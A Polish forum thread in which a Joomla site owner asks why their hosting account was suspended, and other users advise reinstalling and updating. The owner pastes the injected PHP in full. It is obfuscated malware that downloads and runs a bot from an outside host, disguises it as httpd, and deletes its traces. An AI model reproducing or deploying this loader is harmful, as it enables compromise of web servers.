We are in the process of migrating this forum. A new space will be available soon. We are sorry for the inconvenience.

Zewnętrzny kod uruchamiany na stronie


Pneumatyka
19-12-2010, 18:20
Miałam podobną sytuację. Zainstalowałam joomlę od podstaw i powgrywałam mody antyspamowe i pomogło

Ela

borec
10-10-2008, 10:35
Może po prostu usuń ten kod ze strony i zaktualizuj joomlę, bo widać, że ktoś Ci to wstrzyknął.

caus
09-10-2008, 23:02
Witam serdecznie,
Od jakiegoś czasu moje konto zostało zablokowane (firstaid.ovh.org), gdyż z adresu był ściągany i uruchamiany zewnętrzny kod (taką informację otrzymałem od działu pomocy):

$x16="\x65\170e\143"; $x17="\146\x65\157\x66"; $x18="\x66\162\x65\141d";
$x19="fun\143\164\x69\157\x6e_\145x\x69s\164\163"; $x1a="\147e\x74en\166";
$x1b="is_f\x69\x6c\145"; $x1c="is\137\162\x65s\157u\x72\x63e";
$x1d="is\x5f\167r\151\164\141\142l\145"; $x1e="\152o\151\156";
$x1f="o\x62\137\x67\x65t_\x63o\156te\156\164s"; $x20="o\x62\137\145\156\x64\137cl\145a\156";
$x21="\x6f\x62_s\164\141\162\x74"; $x22="pa\x73st\150\162\165"; $x23="\x70\143\154o\163\x65";
$x24="\x70\157\160\x65\156"; $x25="\x73he\x6c\x6c_\145\x78\x65\143";
$x26="\x73\154e\145p"; $x27="\163\164r\164\x6f\164\x69\155\145";
$x28="\163\x79\x73\x74e\155"; $x29="\x74\157\165\x63h";
$x0b =
"\150\164t\x70\x3a//\x63\1624n\153.\141\164\150.\x63\x78/\x68\062\x2f";$x0c = "\057\165s\x72\057s\x62in\x2f\x68\x74\x74pd";$ x0d =
"\057\164m\x70/";$x0e = "\06200\x32\x2d0\x38-\061\071\040\061\x31\0721\065:5\x31";$x0f =
$x1a("R\x45MO\x54\105\x5f\101\x44\104\122");$x10 =
"\150tt\160\x3a\x2f\x2f$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";function x0b($x11,$x0d,$x0b,$x0e){ global
$x16,$x17,$x18,$x19,$x1a,$x1b,$x1c,$x1d,$x1e,$x1f, $x20,$x21,$x22,$x23,$x24,$x25,$x26,$x27,$x28,$x29; if (!$x1b( $x0d.$x11 )){ x0c('cd '.$x0d.' ; wget
'.$x0b.$x11);}if (!$x1b( $x0d.$x11 )){ x0c('cd '.$x0d.' ; curl '.$x0b.$x11.' -o
'.$x0d.$x11);}$x12 = $x27($x0e);$x29($x0d.$x11,$x12);}function x0c($x13){
global
$x16,$x17,$x18,$x19,$x1a,$x1b,$x1c,$x1d,$x1e,$x1f, $x20,$x21,$x22,$x23,$x24,$x25,$x26,$x27,$x28,$x29; if (!empty($x13)) {if($x19('exec'))
{@$x16($x13,$x14);$x14 = $x1e("\n",$x14); }elseif($x19('shell_exec')) {$x14 =
@$x25($x13); }elseif($x19('system')) {@$x21();@$x28($x13);$x14 = @$x1f();@$x20();
}elseif($x19('passthru')) {@$x21();@$x22($x13);$x14 = @$x1f();@$x20();
}elseif(@$x1c($x15 = @$x24($x13,"\x72"))){ $x14 = ""; while(!@$x17($x15)) { $x14 .=
@$x18($x15,1024); } @$x23($x15);} } if(!empty($x14)) return $x14; else return
0;}if ($x1d( $x0d
)){x0b("b\157t",$x0d,$x0b,$x0e);x0b("\x78h",$x0d,$ x0b,$x0e);x0c('cd '.$x0d.' ; echo "'.$x10.'" >> crank.2x2');x0c('cd '.$x0d.' ; chmod 770
bot xh');x0c('cd '.$x0d.' ; mv bot httpd');x0c('cd '.$x0d.' ; ./xh -s
"'.$x0c.'" -d ./httpd');$x26(5);x0c('cd '.$x0d.' ; rm httpd');x0c('cd '.$x0d.' ; rm
xh');}exit();?>

A przyczyna zablokowania konta to:

http://firstaid.ovh.org/errors.php?e...e/cr4nk/bitch?

Co ten kod powodował? Czy na podstawie powyższego kodu można zlokalizować "dziury" w zabezpieczeniach strony? A jeśli tak, to jak je usunąć? Serwis chodził na Joomli.. Bardzo proszę o pomoc
Pozdrawiam